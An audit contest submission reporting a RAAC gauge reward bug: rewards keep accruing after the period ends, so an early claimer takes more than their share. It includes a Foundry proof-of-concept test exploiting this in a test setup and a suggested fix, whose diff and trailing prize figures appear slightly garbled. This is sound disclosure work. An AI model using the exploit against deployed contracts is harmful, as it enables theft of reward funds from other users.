Submission Details
Severity:
Gauge user can claim more rewards than expected if they claim after period ends
Summary
Gauge user can claim more rewards than expected if they claim after period ends.
Vulnerability Details
Gauge reward per token is calculated by multiplying elapsed time (lastTimeRewardApplicable() - lastUpdateTime) with reward rate.
function getRewardPerToken() public view returns (uint256) {
if (totalSupply() == 0) {
return rewardPerTokenStored;
}
return rewardPerTokenStored + (
(lastTimeRewardApplicable() - lastUpdateTime) * rewardRate * 1e18 / totalSupply()
);
}
The problem is the elapsed time is not capped to period duration, if user claims after the end of the period, they can claim more rewards than expected.
Impact
User claim more rewards than expected.
POC
Change BaseGauge.sol#L585 as below to fix the rewards calculation issue:
- (getRewardPerToken() - userStates[account].rewardPerTokenPaid) / 1e18
+ _balances[msg.sender] * (getRewardPerToken() - userStates[account].rewardPerTokenPaid) / 10000 / 1e18
Run
forge test --mt testAudit_GaugeRewardPerToken.
// SPDX-License-Identifier: MIT
import {Test, console, stdError} from "forge-std/Test.sol";
import "@openzeppelin/contracts/utils/math/SafeCast.sol";
import "@openzeppelin/contracts/proxy/transparent/TransparentUpgradeableProxy.sol";
import "../contracts/libraries/math/WadRayMath.sol";
import "../contracts/core/pools/LendingPool/LendingPool.sol";
import "../contracts/core/pools/StabilityPool/StabilityPool.sol";
import "../contracts/mocks/core/tokens/crvUSDToken.sol";
import "../contracts/core/tokens/RToken.sol";
import "../contracts/core/tokens/DebtToken.sol";
import "../contracts/core/tokens/DeToken.sol";
import "../contracts/core/tokens/RAACToken.sol";
import "../contracts/core/tokens/RAACNFT.sol";
import "../contracts/core/tokens/veRAACToken.sol";
import "../contracts/core/primitives/RAACHousePrices.sol";
import "../contracts/core/minters/RAACMinter/RAACMinter.sol";
import "../contracts/core/collectors/FeeCollector.sol";
import "../contracts/core/collectors/Treasury.sol";
import "../contracts/core/governance/proposals/Governance.sol";
import "../contracts/core/governance/proposals/TimelockController.sol";
import "../contracts/core/governance/boost/BoostController.sol";
import "../contracts/core/governance/gauges/RAACGauge.sol";
import "../contracts/core/governance/gauges/GaugeController.sol";
import "../contracts/mocks/core/pools/MockPool.sol";
import "../contracts/mocks/core/tokens/MockToken.sol";
contract Audit is Test {
using WadRayMath for uint256;
using SafeCast for uint256;
address owner = makeAddr("Owner");
address repairFund = makeAddr("RepairFund");
LendingPool lendingPool;
StabilityPool stabilityPool;
RAACHousePrices raacHousePrices;
crvUSDToken crvUSD;
RToken rToken;
DebtToken debtToken;
DEToken deToken;
RAACToken raacToken;
RAACNFT raacNft;
veRAACToken veRaacToken;
RAACMinter raacMinter;
FeeCollector feeCollector;
Treasury treasury;
Governance governance;
TimelockController timelockController;
BoostController boostController;
GaugeController gaugeController;
RAACGauge raacGauge;
MockToken gaugeRewardToken;
MockToken gaugeStakingToken;
function setUp() public {
vm.warp(1740000000);
vm.startPrank(owner);
raacHousePrices = new RAACHousePrices(owner);
// Deploy tokens
raacToken = new RAACToken(owner, 100, 50);
veRaacToken = new veRAACToken(address(raacToken));
crvUSD = new crvUSDToken(owner);
rToken = new RToken("RToken", "RToken", owner, address(crvUSD));
debtToken = new DebtToken("DebtToken", "DT", owner);
raacNft = new RAACNFT(address(crvUSD), address(raacHousePrices), owner);
deToken = new DEToken("DEToken", "DEToken", owner, address(rToken));
// Deploy Treasury and FeeCollector
treasury = new Treasury(owner);
feeCollector = new FeeCollector(
address(raacToken),
address(veRaacToken),
address(treasury),
repairFund,
owner
);
// Deploy LendingPool
lendingPool = new LendingPool(
address(crvUSD),
address(rToken),
address(debtToken),
address(raacNft),
address(raacHousePrices),
0.1e27
);
// Deploy stabilityPool Proxy
bytes memory data = abi.encodeWithSelector(
StabilityPool.initialize.selector,
address(rToken),
address(deToken),
address(raacToken),
address(owner),
address(crvUSD),
address(lendingPool)
);
address stabilityPoolProxy = address(
new TransparentUpgradeableProxy(
address(new StabilityPool(owner)),
owner,
data
)
);
stabilityPool = StabilityPool(stabilityPoolProxy);
// RAACMinter
raacMinter = new RAACMinter(
address(raacToken),
address(stabilityPool),
address(lendingPool),
owner
);
// Governance
address[] memory proposers;
address[] memory executors;
timelockController = new TimelockController(2 days, proposers, executors, owner);
governance = new Governance(address(veRaacToken), address(timelockController));
// Boost
boostController = new BoostController(address(veRaacToken));
// Gauges
gaugeController = new GaugeController(address(veRaacToken));
gaugeRewardToken = new MockToken("Reward Token", "RWD", 18);
gaugeStakingToken = new MockToken("veRAAC Token", "veRAAC", 18);
raacGauge = new RAACGauge(address(gaugeRewardToken), address(gaugeStakingToken), address(gaugeController));
// Initialization
raacHousePrices.setOracle(owner);
rToken.setReservePool(address(lendingPool));
debtToken.setReservePool(address(lendingPool));
deToken.setStabilityPool(address(stabilityPool));
stabilityPool.setRAACMinter(address(raacMinter));
lendingPool.setStabilityPool(address(stabilityPool));
raacToken.setMinter(address(raacMinter));
raacToken.setFeeCollector(address(feeCollector));
raacToken.manageWhitelist(address(feeCollector), true);
raacToken.manageWhitelist(address(raacMinter), true);
raacToken.manageWhitelist(address(stabilityPool), true);
raacToken.manageWhitelist(address(veRaacToken), true);
timelockController.grantRole(keccak256("PROPOSER_ROLE"), address(governance));
timelockController.grantRole(keccak256("EXECUTOR_ROLE"), address(governance));
timelockController.grantRole(keccak256("CANCELLER_ROLE"), address(governance));
timelockController.grantRole(keccak256("EMERGENCY_ROLE"), address(governance));
vm.stopPrank();
vm.label(address(crvUSD), "crvUSD");
vm.label(address(rToken), "RToken");
vm.label(address(debtToken), "DebtToken");
vm.label(address(deToken), "DEToken");
vm.label(address(raacToken), "RAACToken");
vm.label(address(raacNft), "RAAC NFT");
vm.label(address(lendingPool), "LendingPool");
vm.label(address(stabilityPool), "StabilityPool");
vm.label(address(raacMinter), "RAACMinter");
vm.label(address(veRaacToken), "veRAAC");
vm.label(address(feeCollector), "FeeCollector");
vm.label(address(treasury), "Treasury");
vm.label(address(governance), "Governance");
vm.label(address(timelockController), "TimelockController");
vm.label(address(boostController), "BoostController");
vm.label(address(gaugeController), "GaugeController");
vm.label(address(raacGauge), "RAACGauge");
vm.label(address(gaugeRewardToken), "GaugeRewardToken");
vm.label(address(gaugeStakingToken), "GaugeStakingToken");
}
function testAudit_GaugeRewardPerToken() public {
vm.prank(owner);
gaugeController.addGauge(address(raacGauge), IGaugeController.GaugeType.RAAC, 10000);
(,,,uint256 periodStartTime) = raacGauge.periodState();
vm.warp(periodStartTime);
address alice = makeAddr("Alice");
address bob = makeAddr("Bob");
uint256 stakingAmount = 100e18;
deal(address(gaugeStakingToken), alice, stakingAmount);
deal(address(gaugeStakingToken), bob, stakingAmount);
// Stake
vm.startPrank(alice);
gaugeStakingToken.approve(address(raacGauge), stakingAmount);
raacGauge.stake(stakingAmount);
vm.stopPrank();
vm.startPrank(bob);
gaugeStakingToken.approve(address(raacGauge), stakingAmount);
raacGauge.stake(stakingAmount);
vm.stopPrank();
// Distribute rewards
deal(address(gaugeRewardToken), address(raacGauge), 10000e18);
vm.prank(address(gaugeController));
raacGauge.notifyRewardAmount(10000e18);
// Period has ends
vm.warp(block.timestamp + raacGauge.getPeriodDuration() + 1 days);
vm.prank(alice);
raacGauge.getReward();
// Alice claim more than half of the distributed reward
assertApproxEqAbs(gaugeRewardToken.balanceOf(alice), 5715e18, 1e18);
// Bob cannot claim reward
vm.prank(bob);
vm.expectRevert(IGauge.InsufficientBalance.selector);
raacGauge.getReward();
}
}
Tools Used
Manual Review
Recommendations
function getRewardPerToken() public view returns (uint256) {
if (totalSupply() == 0) {
return rewardPerTokenStored;
}
+ uint256 current = block.timestamp;
+ if (current > periodState.periodStartTime + getPeriodDuration()) {
+ current = periodState.periodStartTime + getPeriodDuration();
+ }
return rewardPerTokenStored + (
- (lastTimeRewardApplicable() - lastUpdateTime) * rewardRate * 1e18 / totalSupply()
- (current - lastUpdateTime) * rewardRate * 1e18 / totalSupply()
);
}
Updates
Lead Judging Commences
inallhonesty 7 months ago
Submission Judgement Published Assigned finding tags:
BaseGauge sets user's lastUpdateTime to uncapped block.timestamp while global lastUpdateTime uses capped lastTimeRewardApplicable(), generating reward calc inconsistencies after period ends
inallhonesty 7 months ago
Submission Judgement Published Assigned finding tags:
BaseGauge sets user's lastUpdateTime to uncapped block.timestamp while global lastUpdateTime uses capped lastTimeRewardApplicable(), generating reward calc inconsistencies after period ends
Prize pool breakdown
Total prize
77,280 USDC
nSLOC
3,86420
USDC / LOC
74,000
3,280
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.